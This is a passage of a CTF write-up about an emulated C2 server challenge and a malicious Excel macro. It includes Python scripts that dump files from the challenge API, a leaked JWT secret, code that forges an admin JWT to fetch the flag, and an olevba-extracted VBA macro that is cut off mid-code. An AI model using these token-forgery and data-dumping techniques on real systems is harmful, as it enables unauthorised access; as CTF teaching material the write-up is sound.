url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAl0lEQVQoz62Q6w6DIAyFef8XdYoQoa3DC5xZNsziP7M1+XJOb4TUuOAxJwE/6UQSg+Z4ED4aL/m1/kZ3Tdc90PcDrLUY7YhB/WDhvQcRg5mrElH1wlK9IiK1xtqPhJwLzLquWJYFqt9s24Zc8jF0g2PeTNOE9uiVlNJtTAgB+77XHzVtaH4XQxThnKv3+EeYUsp5A/W/8gK1niQL8jdQ3AAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/8ac56/image-20240710225446024.webp 240w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d3be9/image-20240710225446024.webp 480w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/e46b2/image-20240710225446024.webp 960w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/93852/image-20240710225446024.webp 1010w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/8ff5a/image-20240710225446024.png 240w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/e85cb/image-20240710225446024.png 480w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d9199/image-20240710225446024.png 
960w,\n/static/dd85c2feec2bdc6a08e64d6ed7868c0e/5b587/image-20240710225446024.png 1010w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/dd85c2feec2bdc6a08e64d6ed7868c0e/d9199/image-20240710225446024.png\"\n            alt=\"image-20240710225446024\"\n            title=\"image-20240710225446024\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The response also stated that Subject 0 does not have permission to access it.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 423px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 42.91666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/4f598e1b59d7cff6ec15748a559d5fca/8ac56/image-20240710225527867.webp 240w,\n/static/4f598e1b59d7cff6ec15748a559d5fca/2c5ea/image-20240710225527867.webp 423w\"\n              sizes=\"(max-width: 423px) 100vw, 423px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/4f598e1b59d7cff6ec15748a559d5fca/8ff5a/image-20240710225527867.png 240w,\n/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png 423w\"\n            sizes=\"(max-width: 423px) 
100vw, 423px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/4f598e1b59d7cff6ec15748a559d5fca/f687d/image-20240710225527867.png\"\n            alt=\"image-20240710225527867\"\n            title=\"image-20240710225527867\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>I tried to see whether I could tamper with the JWT token, but the <code class=\"language-text\">\"alg:none\" attack</code> did not seem to work.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/081ff/image-20240711054607530.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 22.083333333333332%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAf0lEQVQY06VPyw6DMAzr/38k0g48yrbSNhxIaeqZadsJcVkiywcnTuyej4BVBLpX5CSYxjtiTFBVmBlqrcSXz2HUd+4veYXr+xldd4P3E9Jh6COWGKFFURsX7BrW7MeN7YYhYORXIhmlFAoUj/4MXhmcsQtBGJGRdXtH5JG/6gV10TmwLX2mawAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/8ac56/image-20240711054607530.webp 240w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/d3be9/image-20240711054607530.webp 480w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/e46b2/image-20240711054607530.webp 960w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/f992d/image-20240711054607530.webp 
1440w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/882b9/image-20240711054607530.webp 1920w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/79080/image-20240711054607530.webp 2182w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/8ff5a/image-20240711054607530.png 240w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/e85cb/image-20240711054607530.png 480w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/d9199/image-20240711054607530.png 960w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/07a9c/image-20240711054607530.png 1440w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/29114/image-20240711054607530.png 1920w,\n/static/b2a0fccb172807f4f6c5b5f149eb3d73/081ff/image-20240711054607530.png 2182w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b2a0fccb172807f4f6c5b5f149eb3d73/d9199/image-20240711054607530.png\"\n            alt=\"image-20240711054607530\"\n            title=\"image-20240711054607530\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Reference: <a href=\"https://scgajge12.hatenablog.com/entry/jwt_security#31-%E3%82%A2%E3%83%AB%E3%82%B4%E3%83%AA%E3%82%BA%E3%83%A0alg%E3%81%AE%E6%93%8D%E4%BD%9C\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">An introduction to JWT from a security perspective - blog of morioka12</a></p>\n<p>When I checked the behavior of the C2 server again, I confirmed that issuing a GET request to list <code class=\"language-text\">/api/env/</code> returns random strings, as already seen.</p>\n<p>Also, when I analyzed the packet capture, I saw that sending a POST request to <code class=\"language-text\">/api/env/</code> 
reported that data had been uploaded using a random string as the filename.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 609px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 37.916666666666664%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAzElEQVQoz61R2Q6CMBDs/3+d4pNHasJp5BBEBdpuxy2mGkngRSeZnunszFaUVYmqqmCMgbX2ZwonRER/ERsFLYDu3gKk4UH2VcDBz9PzOQg3aKUg9wes1iskcYqbahHX8ci8PSO/5UjqCGlzguZEvtCsQ4ejlNgEAba7PZTRyK4nZsYiCbImRVSHCC8hC8dI3J7XspBcrGDnnzRijErqy7a78PE8XZ+X4Fsh7r3mWD2unUbZDqgfavHRHN8ODVkMmrg3LypDi4+nHzXFE6pHdB7CruGVAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/541b8036e8c66a0498494f79628d2176/8ac56/image-20240711055306852.webp 240w,\n/static/541b8036e8c66a0498494f79628d2176/d3be9/image-20240711055306852.webp 480w,\n/static/541b8036e8c66a0498494f79628d2176/117a4/image-20240711055306852.webp 609w\"\n              sizes=\"(max-width: 609px) 100vw, 609px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/541b8036e8c66a0498494f79628d2176/8ff5a/image-20240711055306852.png 240w,\n/static/541b8036e8c66a0498494f79628d2176/e85cb/image-20240711055306852.png 480w,\n/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png 609w\"\n            sizes=\"(max-width: 609px) 100vw, 609px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            
src=\"/static/541b8036e8c66a0498494f79628d2176/d0d8c/image-20240711055306852.png\"\n            alt=\"image-20240711055306852\"\n            title=\"image-20240711055306852\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>So, for now, I dumped all uploaded information with the following script.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> requests\n\nwords <span class=\"token operator\">=</span> <span class=\"token punctuation\">[</span><span class=\"token string\">\"YeIzRgKdWkx6EhyH8FPtQinoUI42yR7B\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"SENmvOvr1rC4BQQ7ugTi2Mht9UXUFQQH\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"3b2NQO9CM7ZinEyVNQkwkVx5r684TIwl\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AbZ9FbNDzJ5ACbGKJ8ezjdod2Jr4x0iW\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"eWnjieXEMQ7Bj6tpLluchBBH7sDsCt3M\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"hLJh9TRNut3rSLWJQ6CsGs3OuNjmfYxb\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"M5ZU5KLyrjulq7QpLhKiJMwRrAMq3MZq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1awDrBxaMbwAhOcvfyntbliw3qanrSKT\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"FIJRM8kwWj1ye4JwPHg7IJg7PxJBtoXX\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"iu19ErtsjrQgTMohSnGJ46iMVai9ONOZ\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"2ervnWvp24g0pHZ81V3W9j2k0NmrkY1Z\"</span><span class=\"token punctuation\">,</span><span class=\"token 
string\">\"T4yLN35GKLhxTgaykWxdgROCAwIBE3FO\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"HW8UkDvnQ8HFrTkyLHOIMMwywiTvCwfS\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Cc5LKVk8n2N6F5BD9shXDlBX0NYG5RP3\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"YB64wqRiqblY7Bhk2z03bvwYLF9pk8o8\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OxcOm5DyESp49smKwYmb6N9sr2yjZPv3\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"khmmeFNPFAhizYWKyvYMnLA7GVsJNvDt\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Q3aoz6KBVGScMKS1Jfr6ewy9ix8q9elJ\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jwbZUL8C5rj7DeuCEKZBGokgEh4ujMk1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"LlqhKxf2yh8loi7ydfBBg18QKjDS33H0\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"kpSKlqhaNIL8g2EgACu3353i1p3Hh2CJ\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"n9tt6MNRJRoY8SIKqEoZnqxJpZmujQuR\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1l4w5VOiIQ4pf7rid49GvvaXkhD5yIcw\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ddl17btjos89HSpMlz4w1esNdp1BbPA7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jYyikfLWMl2nwZKLPZOI7yoX6Gsafj6Y\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nx65kRioTaH87erafNtKaogarwPZYgn4\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"CU6ITn3A3r6PI089rdqbldt1MKSBOR8e\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AYenVSd8ShOKt7in9tLAUTb1IPRminC4\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"BWO7KhzutnIAYRNdiUi6s4PMMheBFC4A\"</span><span 
class=\"token punctuation\">,</span><span class=\"token string\">\"HlFqicDoJqA12cmHy8bnZd0GuSSqqL8q\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"8J71fW0218FzmBkF8ttefJrz7BpVtI8F\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"9QCWBIwQaNedL5NrTrymVUln0X9zDaPg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"WbUwqhFlnuycALJgSSYb0VjeAgNtIhan\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4GagZFf0emVWMqVZGuSQ0Wt3oesDqTId\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"hJgMfU0P4DZoXEQ3jPLmQqYrMcLL6tMq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"Ie4Ct3weRbyqVZuU8D5WEJ9WzDaGkUeG\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"HBQW4v8Jx72LIeSA3gssnxODtUiR12iY\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"dlPoTSiQQhQW0LArsYjaXOlg5FhCECNX\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"1cLnEiDa0ZBFZMg0sRnB6uAGssFooEwd\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"h9ZZhUm8LRlXcTwSyPkhbyeH8WopzgK1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"b6dQeUSvK6BaKu6hqGKjac1wljmECerf\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"vOW0m1zK5Ene3eEFxoYlGBDY6PhMG6Ug\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4Hmer55iqHNq4fMbUgLTT96KDsceFHQz\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"TS9mqDcYUu9DUA1b9QoPqSeLMZFJNCKq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"3zzwJVC13tWXVaBSwumerFZX10ZEwSx5\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"AL7Q1tqteIiAMoDAKLmx3PQ7uCtb1WCy\"</span><span class=\"token punctuation\">,</span><span class=\"token 
string\">\"ggnR5ZzLSVr12T8k7cyRMAdlBuOLOQAr\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"w9SSZPc1qWUAGWE8pyLeB9XIRO79mzDs\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"u2YrePZCdoytCV6Eiund5dcubFdq2hPx\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"JShVnYgvoW5Lim3WL3qlqRMoTBGU4ATF\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"rnWQN9Hda8uDMoEqSdVGzvEtXuFJRZTT\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"u6dGg8b4YO8NylRJlTVnURjBxMlRmtVy\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"sD2esH8RTuqsD23PlfGCE0q5JdjnLb6t\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ELfvFcLKnMyCwj7ruRbSkZKghcY4R2k6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"xkzsLBLgP6dzDZYeiTzlwFpdsdS53fbg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"L3VHzsrMHOPXtxfjsX9IEuMdWXiAN4lA\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"WGzrln1mR9mAgIYeCkkYZm5RIvdajkAi\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"9e1Y8jnY3j7Lkf8a03szPcqPqPDSGv6y\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"yTYSAZPsUbDCZbOg6XYBlFm7q6G4v3aq\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"rDmj6xnsGnm0MJQHvpuSbSXmkvanFQca\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"QFNahJX4von8pvpS5cy6bh2tyWGEcJwK\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4LulvNMUoxwKcKXZm7DQxGOyZmUDAxn7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OiGiv5uCIyfNlTf0iePAiNe6lX3pVvJ7\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nY8G2nYcKhvEJ5s2BD4SHECmTKKn1CSL\"</span><span 
class=\"token punctuation\">,</span><span class=\"token string\">\"1K4qLxDn5gLF6gzcbetXP6HqGpghXmcI\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"4B4feCWkGFTlsoBI8Nxca380Xyv9sfA6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"cDg0B5zh6q632VASxaeXNejqBABNFpWE\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"jZN0vVGts01Zr0xIJ6o2b6InEolghLr5\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"D8YzDAIwPFfLxwFcoCZSW02NzAoRM0lo\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"YCtiLWwcqptffHjTurKWv0zWlm87upmg\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"iSf2RPy3sdNeP6roA80UkxgqMrkOoXdf\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"nQD8z2wBoGOyIZ0311jUWAF0YlXsvg41\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"8ChT1ap67PVswJSBp6l7K8XLB8xlu89t\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"h83hTYu1lSFrhnMn1YrUxXdhRyy7lITP\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"oIjgXMJi0VvqTTvEY4G6ys7BjbQD9bpD\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"sd8CGK9j5eD0G8UUp0UkdgLc7tjxbkom\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"gSsaLGJVrbCvhXDa2tsgR9tZpzfd7gbS\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"GMBb01VPPfnMxJJTANYwfYnckBv0tB2w\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"JcMLJHRDcwmZ7T4OyoKZHg3A952Rbc3L\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"fLJBKWU3l5o7N1XxxVlG4JwyHCDqhJFY\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"ABgupVqa3fWHnbF6u4JH2tIzn4nuXf8e\"</span><span class=\"token punctuation\">,</span><span class=\"token 
string\">\"1rJ4C9rcoWaW40fZEGA4vUY11azYLw04\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"aOLKa8rN9em0kQ0sfLeoRmVXY7L17Il1\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"6FND9ZASwt4GYHLuoCwFZ6JXYcYHuAh2\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"PqGpPjPKySbkf9tZkLS2X63xMHCwNUto\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"lNcHGKv23aHR7BApWAC0uOz067fmOaM6\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"60rV2f60cvJW5FXPf6RwdqSz2nKeJ5Nz\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"OZS5oCbUw8B0MtdSwxIkOHKn2N9xJhBw\"</span><span class=\"token punctuation\">]</span>\n<span class=\"token keyword\">with</span> <span class=\"token builtin\">open</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"out.txt\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"w\"</span><span class=\"token punctuation\">)</span> <span class=\"token keyword\">as</span> f<span class=\"token punctuation\">:</span>\n    <span class=\"token keyword\">for</span> word <span class=\"token keyword\">in</span> words<span class=\"token punctuation\">:</span>\n        response <span class=\"token operator\">=</span> requests<span class=\"token punctuation\">.</span>get<span class=\"token punctuation\">(</span><span class=\"token string-interpolation\"><span class=\"token string\">f\"https://forensics-emuc2-b6abd8652aa4.2024.ductf.dev/api/env/</span><span class=\"token interpolation\"><span class=\"token punctuation\">{</span>word<span class=\"token punctuation\">}</span></span><span class=\"token string\">\"</span></span><span class=\"token punctuation\">)</span>\n        f<span class=\"token punctuation\">.</span>write<span class=\"token punctuation\">(</span>response<span class=\"token punctuation\">.</span>text<span class=\"token 
punctuation\">)</span></code></pre></div>\n<p>While digging through the dumped files, I found information called <code class=\"language-text\">JWT_SECRET</code>.</p>\n<p>This appears to be the JWT secret key.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token assign-left variable\">JWT_SECRET</span><span class=\"token operator\">=</span>3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi</code></pre></div>\n<p>With that, it seemed possible to use arbitrary data as a JWT token.</p>\n<p>Using the following script, I created a JWT token with <code class=\"language-text\">subject_id</code> changed to 1.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">import</span> jwt\npayload <span class=\"token operator\">=</span> <span class=\"token punctuation\">{</span><span class=\"token string\">\"subject_id\"</span><span class=\"token punctuation\">:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"exp\"</span><span class=\"token punctuation\">:</span> <span class=\"token number\">1720649521</span><span class=\"token punctuation\">}</span>\nsecret <span class=\"token operator\">=</span> <span class=\"token 
string\">r\"3gHsCBkpZLi99zyiPqfY/NfFJqZzmNL4BAhYN8rAjRn49baTcnmyGISLD6T58XcWIUYrBfltI2iq2N6OHQSrfqBRFxFta61PvmnfRyn8Ep8T55lvLT8Es62kN3x35Bcb0OZmOGmM/zKf2qadcBq3Nbq1MiIVKJMz4w3JOk4orwFPtSNpNh8uaSQQUNMKTT6cvD9bvRvFNeeHYSPhDFwayPIRr5TJ+BpIRTUTfc1C3WCKoOuXCz2t+ISZo5yYwZ6U5w7NKFTTuDqMP/dXevkVykuntdej55XE3fsCP+UVFUT2JrY+Z9Q1aKTgavQR5smYVn93RlpbFwCoSStoANnoi\"</span>\ntoken <span class=\"token operator\">=</span> jwt<span class=\"token punctuation\">.</span>encode<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">,</span> secret<span class=\"token punctuation\">,</span> algorithm<span class=\"token operator\">=</span><span class=\"token string\">\"HS512\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>token<span class=\"token punctuation\">)</span></code></pre></div>\n<p>When I used this to call <code class=\"language-text\">/api/flag</code>, I was able to obtain the correct flag as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/46c7002156f50fc4c649cb27dfc34031/72aae/image-20240711060528407.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.083333333333336%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/46c7002156f50fc4c649cb27dfc34031/8ac56/image-20240711060528407.webp 240w,\n/static/46c7002156f50fc4c649cb27dfc34031/d3be9/image-20240711060528407.webp 
480w,\n/static/46c7002156f50fc4c649cb27dfc34031/e46b2/image-20240711060528407.webp 960w,\n/static/46c7002156f50fc4c649cb27dfc34031/6bfb6/image-20240711060528407.webp 964w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/46c7002156f50fc4c649cb27dfc34031/8ff5a/image-20240711060528407.png 240w,\n/static/46c7002156f50fc4c649cb27dfc34031/e85cb/image-20240711060528407.png 480w,\n/static/46c7002156f50fc4c649cb27dfc34031/d9199/image-20240711060528407.png 960w,\n/static/46c7002156f50fc4c649cb27dfc34031/72aae/image-20240711060528407.png 964w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/46c7002156f50fc4c649cb27dfc34031/d9199/image-20240711060528407.png\"\n            alt=\"image-20240711060528407\"\n            title=\"image-20240711060528407\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"macro-magicforensic\" style=\"position:relative;\"><a href=\"#macro-magicforensic\" aria-label=\"macro magicforensic permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Macro Magic(Forensic)</h2>\n<blockquote>\n<p>We managed to pull this excel spreadsheet artifact from one of our Outpost machines. 
Its got something sus happening under the hood. After opening we found and captured some suspicious traffic on our network. Can you find out what this traffic is and find the flag!</p>\n</blockquote>\n<p>The challenge provides a suspicious macro file and a packet capture as artifacts.</p>\n<p>For now, I used <code class=\"language-text\">olevba</code> to extract the script from the macro file.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">olevba Monke.xlsm</code></pre></div>\n<p>The code extracted from it was as follows.</p>\n<div class=\"gatsby-highlight\" data-language=\"visualbasic\"><pre class=\"language-visualbasic\"><code class=\"language-visualbasic\">Public Function anotherThing(B As String, C As String) As String\n    Dim I As Long\n    Dim A As String\n    For I = 1 To Len(B)\n        A = A &amp; Chr(Asc(Mid(B, I, 1)) Xor Asc(Mid(C, (I - 1) Mod Len(C) + 1, 1)))\n    Next I\n    anotherThing = A\nEnd Function\n\nPublic Function importantThing()\n    Dim tempString As String\n    Dim tempInteger As Integer\n    Dim I As Integer\n    Dim J As Integer\n    For I = 1 To 5\n        Cells(I, 2).Value = WorksheetFunction.RandBetween(0, 1000)\n    Next I\n    For I = 1 To 5\n        For J = I + 1 To 5\n            If Cells(J, 2).Value &lt; Cells(I, 2).Value Then\n                tempString = Cells(I, 1).Value\n                Cells(I, 1).Value = Cells(J, 1).Value\n                Cells(J, 1).Value = tempString\n                tempInteger = Cells(I, 2).Value\n                Cells(I, 2).Value = Cells(J, 2).Value\n                Cells(J, 2).Value = tempInteger\n            End If\n        Next J\n    Next I\nEnd Function\n\nPublic Function totalyFine(A As String) As String\n    Dim B As String\n    B = Replace(A, &quot; &quot;, &quot;-&quot;)\n    totalyFine = B\nEnd Function\n\nSub macro1()\n    Dim Path As String\n    Dim wb As Workbook\n    Dim A As String\n    Dim B As String\n    Dim C 
